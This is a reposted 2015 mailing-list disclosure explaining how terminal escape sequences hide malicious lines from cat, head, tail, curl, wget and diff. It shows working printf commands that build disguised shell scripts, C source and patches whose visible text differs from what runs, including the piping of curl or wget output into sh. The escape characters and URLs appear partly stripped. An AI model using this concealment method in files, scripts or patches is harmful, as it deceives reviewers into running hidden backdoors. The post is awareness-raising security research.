HackDig : Dig high-quality web security articles for hacker

s/party/hack like it's 1999

2015-09-20 14:10

Federico Bento <up201407890 () alunos dcc fc up pt>

So recently i've encountered a post by Kurt Seifried of RedHat on oss-sec's mailing list entitled "Terminal escape sequences - the new XSS for admins?"


This is a little misleading title, since escape sequences have been introduced circa 70's, so it's actually not that new.

How it technically works:
A terminal escape sequence is a special sequence of characters that is printed (like any other text).If the terminal understands the sequence, it won't display the character-sequence, but will perform some action.

While some people might already know what i'm going to present you, the majority I believe doesn't, so this is mostly to raise awareness.

$ printf '#!/bin/bashnecho doing something evil!nexitn33[2Aecho doing something very nice!n' > backdoor.sh

$ chmod +x backdoor.sh
$ cat backdoor.sh
echo doing something very nice!
$ ./backdoor.sh
doing something evil!

As you can see, our beloved 'cat' cheated on us. Why?
Because instead of displaying the character-sequence, the escape sequence 33[XA (being X the number of times) performed some action.And this action moves the cursor up X times, overwriting what is above it X lines.But this doesn't affect only 'cat', it affects everything that interprets escape sequences.

$ head backdoor.sh
echo doing something very nice!

$ tail backdoor.sh
echo doing something very nice!

$ more backdoor.sh
echo doing something very nice!

It's not over yet!

$ curl
echo doing something very nice!

$ wget -qO -
echo doing something very nice!

But if we pipe it into a shell...

$ curl -s|sh
doing something evil!

$ wget -qO -|sh
doing something evil!

You might be thinking "If I opened that in my browser, I would detect it being malicious!"

Well, think again...
One can have all sorts of fun with user-agents, something that can easily come to mind is verifying if the user-agent is from curl or wget,

and make them download the malicious file, if not,
redirect them to a legitimate file that looks like the original output. Your browser would fool you then.

I wouldn't even be surprised if most of those install scripts that make use of these 'pipe into sh' bullcrap abused this.I wouldn't even be surprised if most of you were already pwned by escape sequences in any situation at all.Imagine the possibilities, from hidden ssh keys on your authorized_keys to options hidden on your configuration files...It's no secret, most of us rely on 'cat' to view files. I guess this is one black kitty, giving you bad luck.

Here's another example with a .c file

$ printf '#include <stdio.h>nnint main()n{ntprintf("doing something evil\n");nt/*33[2Ant/* This simple program doesnt do much... */ntprintf("doing something very nice\n");ntreturn 0;n}n' > nice.c

$ cat nice.c
#include <stdio.h>

int main()
/* This simple program doesnt do much... */
printf("doing something very nicen");
return 0;
$ gcc nice.c
$ ./a.out
doing something evil
doing something very nice

'diff' also interprets escape sequences and so do the resulting patches

going back to the first example, imagine I have a backdoored.sh that is backdoored, and a legit.sh that does what it's output tells us.

$ cat backdoor.sh #evil file
echo doing something very nice!

$ cat legit.sh #actually echoes doing something very nice!
echo doing something very nice!

$ diff -Naur backdoor.sh legit.sh
--- backdoor.sh 2015-09-17 16:25:42.985349535 +0100
+++ legit.sh 2015-09-17 16:26:14.950158635 +0100
@@ -1,4 +1,2 @@
-echo doing something very nice!
+echo doing something very nice!

$ diff -Naur backdoor.sh legit.sh > file.patch
$ patch legit.sh -R file.patch
$ chmod +x legit.sh
$ ./legit.sh
doing something evil!

'less' doesn't interpret escape sequences unless the -r switch is used,
so stop aliasing it to 'less -r' just because there's no colored output.

s/party/hack like it's 1999

This message was sent using IMP, the Internet Messaging Program.

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/

Source: 57/peS/5102/erusolcsidlluf/gro.stsilces

Read:3021 | Comments:0 | Tags:No Tag

“s/party/hack like it's 1999”0 Comments

Submit A Comment



Blog :

Verification Code:


Share high-quality web security related articles with you:)


Tag Cloud